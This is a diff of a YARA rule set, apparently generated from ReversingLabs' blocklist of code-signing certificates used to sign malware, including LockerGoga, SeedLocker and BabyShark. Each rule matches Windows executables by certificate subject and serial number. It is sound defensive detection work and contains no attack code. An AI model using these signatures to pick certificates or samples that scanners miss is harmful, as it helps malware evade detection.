-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8882-L8900"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2880-L2896"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "be2cd688f2d7c458ee764bd7a7250e0116328702db5585b444d631f05cdc701b"
+		logic_hash = "44b5aae8380e3590ebb6e2365e89b3827432e8330e5290dc8f8603a00bcf62f6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19133,21 +41527,21 @@ rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) and 1616976000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Technical and Commercial Consulting Pvt. Ltd." and pe.signatures [ i ] . serial == "4b:f1:d6:8e:92:6e:2d:d8:96:60:08:c4:4f:95:ea:1c" and 1322092799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_149C12083C145E28155510Cfc19Db0Fe : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3387f396-01f7-58b1-a5bd-b308105c66d6"
+		id = "8d9b0b1c-df7c-560a-8d51-bc8738952457"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8902-L8920"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2898-L2914"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f60753ecb775d664e07e78611568799eaf06fb4742bcef3bf0c28202daf98c50"
+		logic_hash = "f616fc470e223d65ac4c984394a38d566265ab37829ff566012de0a1527396c2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19157,21 +41551,21 @@ rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIK MOTEL S.R.L." and ( pe.signatures [ i ] . serial == "00:e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" or pe.signatures [ i ] . serial == "e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" ) and 1621468800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3rd Eye Solutions Ltd" and pe.signatures [ i ] . serial == "14:9c:12:08:3c:14:5e:28:15:55:10:cf:c1:9d:b0:fe" and 1209340799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_77E0117E8B2B8Faa84Bed961019D5Ef8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "016ad027-bd6a-58e0-9099-341b81dd6f70"
+		id = "2733cc5b-bc1f-5ba9-a2f4-50f472fc288e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8922-L8940"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2916-L2932"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bfcf2fbbd9be97202eeb44c0f81f0a0713d4d30c466f2b170231c7f9df0e9e6d"
+		logic_hash = "bea94b9da8c176f22a66fe7a4545dcc3a38f727a75a0bc7920d9aece8e24b9b7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19181,21 +41575,21 @@ rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YAN CHING LIMITED" and ( pe.signatures [ i ] . serial == "00:af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" or pe.signatures [ i ] . serial == "af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" ) and 1622419200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Reiner Wodey Informationssysteme" and pe.signatures [ i ] . serial == "77:e0:11:7e:8b:2b:8f:aa:84:be:d9:61:01:9d:5e:f8" and 1383695999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F3Feb4Baf377Aea90A463C5Dee63884 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7f72cd2-0bf4-5aa7-804e-4ae354eda055"
+		id = "8de9bcf3-d705-590f-8898-52218f937571"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8942-L8960"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2934-L2950"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cdb3f1983ed17df22d17c6321bc2ead2c391d70fdca4a9f6f4784f62196b85d0"
+		logic_hash = "56c37e758db33aa40e9a2c1c5a4eb14c2c370f614e838d86bf20c64f79e2a746"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19205,21 +41599,21 @@ rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89, s.r.o." and ( pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F3D LIMITED" and pe.signatures [ i ] . serial == "4f:3f:eb:4b:af:37:7a:ea:90:a4:63:c5:de:e6:38:84" and 1526601599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3D2580E89526F7852B570654Efd9A8Bf : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing LockerGoga ransomware."
 		author = "ReversingLabs"
-		id = "f9983426-9f05-56e2-8ad0-1c5a48ab04be"
+		id = "0514759c-2d10-5b29-aa2f-d16eb45b2816"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8962-L8980"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2952-L2968"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2e004116d0f8df5a625b190127655926336fc74b4cce4ae40cd516a135e5d719"
+		logic_hash = "0f46fcfc8ee06756646899450daa254d3e5261bdc5c2339f20d01971608fff7b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19229,21 +41623,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade Hunters, s. r. o." and ( pe.signatures [ i ] . serial == "00:fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" or pe.signatures [ i ] . serial == "fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" and 1529888400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fffe432A53Ff03B9223F88Be1B83D9D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing BabyShark malware."
 		author = "ReversingLabs"
-		id = "c326fbf0-2d95-5aa1-9ae4-6cb04b9c2212"
+		id = "25a4c68b-5774-51a2-9aba-1326c85a5251"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8982-L9000"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2970-L2986"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6739049a61183d506daf9aaf44a3b15cbf2234c6af307ec95bc07fa3d8501105"
+		logic_hash = "e7dbe6b95877f9473661ccf26fa6e5142147609adfe0a9bb8b493875325710af"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19253,21 +41647,21 @@ rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IPM Skupina d.o.o." and ( pe.signatures [ i ] . serial == "00:84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" or pe.signatures [ i ] . serial == "84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" ) and 1621382400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EGIS Co., Ltd." and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" and 1498524050 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_832E161Aea5206D815F973E5A1Feb3E7 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing SeedLocker ransomware."
 		author = "ReversingLabs"
-		id = "5dba4570-51d8-5c23-85a5-5de9a048793f"
+		id = "ecaa250b-d4ac-5cc9-9e5e-5d6f45db18ad"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9002-L9018"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2988-L3006"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3c48241e52e58600bfa0385742831dba59d9cbd959cd6853fe8e030f5df79c23"
+		logic_hash = "da908de031c78aa012809988e44dea564d32b88b65a2010925c1af85d578a68a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19277,21 +41671,21 @@ rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Activ Expeditions ApS" and pe.signatures [ i ] . serial == "09:39:c2:ba:d8:59:c0:43:2e:8e:98:a6:c0:16:2c:02" and 1615939200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Project NSRM Ltd" and ( pe.signatures [ i ] . serial == "00:83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" or pe.signatures [ i ] . serial == "83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" ) and 1549830060 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09Aecea45Bfd40Ce7D62D7D711916D7D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8828c863-2800-5f66-968e-96a41a071218"
+		id = "421425b1-13ad-5d80-b044-8bd43c60b3ff"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9020-L9036"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3008-L3024"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8c803111df930056bdc3ef7560f07bf4d255b93286d01ecc55f790e72565ba5d"
+		logic_hash = "d1c6bfb10a244ba866c8aabdff6055388afa8096fd4bd77bb21f781794333e9b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19301,21 +41695,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Diamartis" and pe.signatures [ i ] . serial == "7f:ba:0e:19:91:9a:c5:0d:70:0b:a6:02:50:d0:2c:8b" and 1623196800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALINA LTD" and pe.signatures [ i ] . serial == "09:ae:ce:a4:5b:fd:40:ce:7d:62:d7:d7:11:91:6d:7d" and 1551052800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Ff4Eda5Fa641E70162713426401F438 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cc8c0cca-1848-5a5e-a421-c5ecdea6ba53"
+		id = "3e34aa1b-a4b1-593d-bd93-0f5913ab96b9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9038-L9056"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3026-L3042"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dcb1ac4c7dcbebd0a432515da82e4a97be6c6c2a54f9d642aa8c1a2bcbdce5de"
+		logic_hash = "58f5e163d9807520497ba55e42c048020f6b7653ed71f3954e7ffb490f4de0e4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19325,21 +41719,21 @@ rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) and 1623628800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" and 1555349604 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_067Dffc5E3026Eb4C62971C98Ac8A900 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e85434e1-1ef5-5660-8ba6-b35cbbe7510d"
+		id = "9b9771bb-c2a4-5a6e-8fdb-b3e98f62f9b1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9058-L9074"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3044-L3060"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "22cb71eebbb212a4436847c11c7ca9cefaf118086b024014c12498a6a5953af5"
+		logic_hash = "2b7c4cded14afd8ba3feabb6debaa1317917b811b44e22aa8a0b3ea00d689141"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19349,21 +41743,21 @@ rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "37:a6:7c:f7:54:ee:5a:e2:84:b4:cf:8b:9d:65:16:04" and 1617321600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "06:7d:ff:c5:e3:02:6e:b4:c6:29:71:c9:8a:c8:a9:00" and 1552176000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B1Da219688E51Fd0Bfac2C891D56Cbb8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ec33498-b299-58e0-be42-9e4fb9549e28"
+		id = "245c582a-b168-53ce-9a3c-b291ae5bc2a0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9076-L9092"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3062-L3080"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "61c49c60fc4fd5d654a6376fcee43e986a5351f085a5652a3c8888774557e053"
+		logic_hash = "03549214940a8689213bd2eb891da1c1991627c81c8b7f26860141c397409d46"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19373,21 +41767,21 @@ rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" and 1619654400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FIRNEEZ EUROPE LIMITED" and ( pe.signatures [ i ] . serial == "00:b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" or pe.signatures [ i ] . serial == "b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" ) and 1542931200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7289B0F9Bd641E3E352Dc3183F8De6Be : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b7830a3a-ddcc-54ef-84dd-5d4b13863f90"
+		id = "dc8a745f-7150-57b7-9ddc-e5a1721d8c02"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9094-L9110"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3082-L3098"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "788abb53ed7974d87c1b1bdbe31dcd3e852ea64745d94780d78d1217ee0206fe"
+		logic_hash = "42b068e85b3aff5e6dd5ec4979f546dc5338ebf8719d86c0641ffb8353959af9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19397,21 +41791,21 @@ rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade By International ApS" and pe.signatures [ i ] . serial == "7a:6d:30:a6:eb:2f:a0:c3:36:92:83:72:57:04:ac:4c" and 1619568000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ICE ACTIVATION LIMITED" and pe.signatures [ i ] . serial == "72:89:b0:f9:bd:64:1e:3e:35:2d:c3:18:3f:8d:e6:be" and 1557933274 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fd7B7A8678A67181A54Bc7499Eba44Da : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "210a0c72-7eb7-5c78-bf5b-1ac292e7fa11"
+		id = "d6456cb6-e950-54be-a7f4-5c1d622c6aab"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9112-L9128"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3100-L3118"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3b1e244b5f543a05beb2475020aa20dfc723f4dce3a5a0a963db1672d3295721"
+		logic_hash = "f1e26ea26890043be2c8b9c35ba2e6758b60fe173f00bf4c77cc5289ce0d5600"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19421,21 +41815,21 @@ rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" and 1622160000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMRAN IT SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" or pe.signatures [ i ] . serial == "fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" ) and 1548028800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ebbdd6Cdeda40Ca64513280Ecd625C54 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9718f290-6ecd-5d67-9013-af99f98fffef"
+		id = "2cf769dc-5108-5f18-a51e-e152180a2b66"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9130-L9146"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3120-L3138"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4022abb8efbda944e35ff529c5b3b3c9f6370127a945f3eec1310149bb5d06e4"
+		logic_hash = "1d419f2fe2a9bf744bdde48adc50e0bc48746f1576f96570385a2a1c9ba92d21"
 		score = 75
 		quality = 90
